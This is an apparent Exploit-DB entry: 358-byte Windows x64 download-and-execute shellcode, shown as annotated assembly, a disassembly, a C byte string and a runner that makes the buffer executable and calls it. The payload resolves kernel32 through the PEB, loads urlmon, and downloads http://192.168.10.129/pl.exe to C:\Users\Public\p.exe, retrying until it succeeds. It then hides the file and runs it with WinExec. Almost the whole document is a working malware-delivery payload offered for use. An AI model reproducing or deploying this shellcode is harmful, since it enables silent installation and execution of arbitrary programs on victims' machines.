Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)

EDB-ID:

40821

CVE:

N/A




Date:

2016-11-23


/*

	# Title : Windows x64 Download+Execute Shellcode
	# Author : Roziul Hasan Khan Shifat
	# Date : 24-11-2016
	# size : 358 bytes
	# Tested on : Windows 7 x64 Professional
	# Email : shifath12@gmail.com  




*/




/*


section .text
	global _start
_start:


;-----------------------------

sub rsp,88

lea r14,[rsp]
sub rsp,88


;------------------------------------------------


xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PEB
mov rsi,[rax+0x18] ;PEB.Ldr
mov rsi,[rsi+0x10] ;PEB.Ldr->InMemOrderModuleList
lodsq
mov rsi,[rax]
mov rdi,[rsi+0x30] ;kernel32.dll base address

;---------------------------------------------------


mov ebx,[rdi+0x3c] ;elf_anew
add rbx,rdi
mov dl,0x88
mov ebx,[rbx+rdx]
add rbx,rdi

mov esi,[rbx+0x1c]
add rsi,rdi
;--------------------------------------------------

;loading urlmon.dll

mov dx,831
mov ebx,[rsi+rdx*4]
add rbx,rdi

xor rdx,rdx


mov [r14],dword 'urlm'
mov [r14+4],word 'on'
mov [r14+6],byte dl

lea rcx,[r14]



call rbx


mov dx,586
mov ebx,[rsi+rdx*4]
add rbx,rdi

xor rdx,rdx

mov rcx,'URLDownl'
mov [r14],rcx
mov rcx,'oadToFil'
mov [r14+8],rcx
mov [r14+16],word 'eA'
mov [r14+18],byte dl


lea rdx,[r14]
mov rcx,rax

call rbx
;;;;;;;;;;;;;;;;;;;;;;-------------------------------------

mov r15,rax

;------------------------------------------------
;save as 'C:\\Users\\Public\\p.exe' length: 24+1

mov rax,'C:\\User'
mov [r14],rax
mov rax,'s\\Publi'
mov [r14+8],rax
mov rax,'c\\p.exe'
mov [r14+16],rax

xor rdx,rdx
mov [r14+24],byte dl


;----------------------------------------


lea rcx,[r14+25]


;url "http://192.168.10.129/pl.exe" length: 28+1

mov rax,'http://1'
mov [rcx],rax
mov rax,'92.168.1'
mov [rcx+8],rax
mov rax,'0.129/pl'
mov [rcx+16],rax
mov [rcx+24],dword '.exe'
mov [rcx+28],byte dl


;---------------------------------------------------

sub rsp,88


download:
xor rcx,rcx
lea rdx,[r14+25]
lea r8,[r14]
xor r9,r9
mov [rsp+32],r9

call r15

xor rdx,rdx
cmp rax,rdx
jnz download



;------------------------------------------------
sub rsp,88
;-----------------------------------------------
;hiding file




mov dx,1131
mov ebx,[rsi+rdx*4]
add rbx,rdi ;SetFileAttributesA()


lea rcx,[r14]
xor rdx,rdx
mov dl,2

call rbx

;------------------------------------
;executing file
xor rdx,rdx
mov dx,1314
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WinExec()


lea rcx,[r14]

xor rdx,rdx



call rbx


;------------------------------
xor rdx,rdx
mov dx,296
mov ebx,[rsi+rdx*4]
add rbx,rdi

;---------------------------------------

;if U use this shellcode for pe injection, then don't forget to free allocated space

add rsp,88
xor rcx,rcx
call rbx


*/

/*


Disassembly of section .text:

0000000000000000 <_start>:
   0:	48 83 ec 58          	sub    $0x58,%rsp
   4:	4c 8d 34 24          	lea    (%rsp),%r14
   8:	48 83 ec 58          	sub    $0x58,%rsp
   c:	48 31 d2             	xor    %rdx,%rdx
   f:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
  14:	48 8b 70 18          	mov    0x18(%rax),%rsi
  18:	48 8b 76 10          	mov    0x10(%rsi),%rsi
  1c:	48 ad                	lods   %ds:(%rsi),%rax
  1e:	48 8b 30             	mov    (%rax),%rsi
  21:	48 8b 7e 30          	mov    0x30(%rsi),%rdi
  25:	8b 5f 3c             	mov    0x3c(%rdi),%ebx
  28:	48 01 fb             	add    %rdi,%rbx
  2b:	b2 88                	mov    $0x88,%dl
  2d:	8b 1c 13             	mov    (%rbx,%rdx,1),%ebx
  30:	48 01 fb             	add    %rdi,%rbx
  33:	8b 73 1c             	mov    0x1c(%rbx),%esi
  36:	48 01 fe             	add    %rdi,%rsi
  39:	66 ba 3f 03          	mov    $0x33f,%dx
  3d:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
  40:	48 01 fb             	add    %rdi,%rbx
  43:	48 31 d2             	xor    %rdx,%rdx
  46:	41 c7 06 75 72 6c 6d 	movl   $0x6d6c7275,(%r14)
  4d:	66 41 c7 46 04 6f 6e 	movw   $0x6e6f,0x4(%r14)
  54:	41 88 56 06          	mov    %dl,0x6(%r14)
  58:	49 8d 0e             	lea    (%r14),%rcx
  5b:	ff d3                	callq  *%rbx
  5d:	66 ba 4a 02          	mov    $0x24a,%dx
  61:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
  64:	48 01 fb             	add    %rdi,%rbx
  67:	48 31 d2             	xor    %rdx,%rdx
  6a:	48 b9 55 52 4c 44 6f 	movabs $0x6c6e776f444c5255,%rcx
  71:	77 6e 6c 
  74:	49 89 0e             	mov    %rcx,(%r14)
  77:	48 b9 6f 61 64 54 6f 	movabs $0x6c69466f5464616f,%rcx
  7e:	46 69 6c 
  81:	49 89 4e 08          	mov    %rcx,0x8(%r14)
  85:	66 41 c7 46 10 65 41 	movw   $0x4165,0x10(%r14)
  8c:	41 88 56 12          	mov    %dl,0x12(%r14)
  90:	49 8d 16             	lea    (%r14),%rdx
  93:	48 89 c1             	mov    %rax,%rcx
  96:	ff d3                	callq  *%rbx
  98:	49 89 c7             	mov    %rax,%r15
  9b:	48 b8 43 3a 5c 5c 55 	movabs $0x726573555c5c3a43,%rax
  a2:	73 65 72 
  a5:	49 89 06             	mov    %rax,(%r14)
  a8:	48 b8 73 5c 5c 50 75 	movabs $0x696c6275505c5c73,%rax
  af:	62 6c 69 
  b2:	49 89 46 08          	mov    %rax,0x8(%r14)
  b6:	48 b8 63 5c 5c 70 2e 	movabs $0x6578652e705c5c63,%rax
  bd:	65 78 65 
  c0:	49 89 46 10          	mov    %rax,0x10(%r14)
  c4:	48 31 d2             	xor    %rdx,%rdx
  c7:	41 88 56 18          	mov    %dl,0x18(%r14)
  cb:	49 8d 4e 19          	lea    0x19(%r14),%rcx
  cf:	48 b8 68 74 74 70 3a 	movabs $0x312f2f3a70747468,%rax
  d6:	2f 2f 31 
  d9:	48 89 01             	mov    %rax,(%rcx)
  dc:	48 b8 39 32 2e 31 36 	movabs $0x312e3836312e3239,%rax
  e3:	38 2e 31 
  e6:	48 89 41 08          	mov    %rax,0x8(%rcx)
  ea:	48 b8 30 2e 31 32 39 	movabs $0x6c702f3932312e30,%rax
  f1:	2f 70 6c 
  f4:	48 89 41 10          	mov    %rax,0x10(%rcx)
  f8:	c7 41 18 2e 65 78 65 	movl   $0x6578652e,0x18(%rcx)
  ff:	88 51 1c             	mov    %dl,0x1c(%rcx)
 102:	48 83 ec 58          	sub    $0x58,%rsp

0000000000000106 <download>:
 106:	48 31 c9             	xor    %rcx,%rcx
 109:	49 8d 56 19          	lea    0x19(%r14),%rdx
 10d:	4d 8d 06             	lea    (%r14),%r8
 110:	4d 31 c9             	xor    %r9,%r9
 113:	4c 89 4c 24 20       	mov    %r9,0x20(%rsp)
 118:	41 ff d7             	callq  *%r15
 11b:	48 31 d2             	xor    %rdx,%rdx
 11e:	48 39 d0             	cmp    %rdx,%rax
 121:	75 e3                	jne    106 <download>
 123:	48 83 ec 58          	sub    $0x58,%rsp
 127:	66 ba 6b 04          	mov    $0x46b,%dx
 12b:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 12e:	48 01 fb             	add    %rdi,%rbx
 131:	49 8d 0e             	lea    (%r14),%rcx
 134:	48 31 d2             	xor    %rdx,%rdx
 137:	b2 02                	mov    $0x2,%dl
 139:	ff d3                	callq  *%rbx
 13b:	48 31 d2             	xor    %rdx,%rdx
 13e:	66 ba 22 05          	mov    $0x522,%dx
 142:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 145:	48 01 fb             	add    %rdi,%rbx
 148:	49 8d 0e             	lea    (%r14),%rcx
 14b:	48 31 d2             	xor    %rdx,%rdx
 14e:	ff d3                	callq  *%rbx
 150:	48 31 d2             	xor    %rdx,%rdx
 153:	66 ba 28 01          	mov    $0x128,%dx
 157:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 15a:	48 01 fb             	add    %rdi,%rbx
 15d:	48 83 c4 58          	add    $0x58,%rsp
 161:	48 31 c9             	xor    %rcx,%rcx
 164:	ff d3                	callq  *%rbx

*/

#include<windows.h>
#include<stdio.h>
#include<string.h>


char shellcode[]=\

"\x48\x83\xec\x58\x4c\x8d\x34\x24\x48\x83\xec\x58\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x66\xba\x3f\x03\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x41\xc7\x06\x75\x72\x6c\x6d\x66\x41\xc7\x46\x04\x6f\x6e\x41\x88\x56\x06\x49\x8d\x0e\xff\xd3\x66\xba\x4a\x02\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x48\xb9\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x49\x89\x0e\x48\xb9\x6f\x61\x64\x54\x6f\x46\x69\x6c\x49\x89\x4e\x08\x66\x41\xc7\x46\x10\x65\x41\x41\x88\x56\x12\x49\x8d\x16\x48\x89\xc1\xff\xd3\x49\x89\xc7\x48\xb8\x43\x3a\x5c\x5c\x55\x73\x65\x72\x49\x89\x06\x48\xb8\x73\x5c\x5c\x50\x75\x62\x6c\x69\x49\x89\x46\x08\x48\xb8\x63\x5c\x5c\x70\x2e\x65\x78\x65\x49\x89\x46\x10\x48\x31\xd2\x41\x88\x56\x18\x49\x8d\x4e\x19\x48\xb8\x68\x74\x74\x70\x3a\x2f\x2f\x31\x48\x89\x01\x48\xb8\x39\x32\x2e\x31\x36\x38\x2e\x31\x48\x89\x41\x08\x48\xb8\x30\x2e\x31\x32\x39\x2f\x70\x6c\x48\x89\x41\x10\xc7\x41\x18\x2e\x65\x78\x65\x88\x51\x1c\x48\x83\xec\x58\x48\x31\xc9\x49\x8d\x56\x19\x4d\x8d\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x41\xff\xd7\x48\x31\xd2\x48\x39\xd0\x75\xe3\x48\x83\xec\x58\x66\xba\x6b\x04\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xb2\x02\xff\xd3\x48\x31\xd2\x66\xba\x22\x05\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xff\xd3\x48\x31\xd2\x66\xba\x28\x01\x8b\x1c\x96\x48\x01\xfb\x48\x83\xc4\x58\x48\x31\xc9\xff\xd3";

int main()
{
int len=strlen(shellcode);
DWORD l=0;
printf("shellcode length : %d\n",len);
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode)();

return 0;

}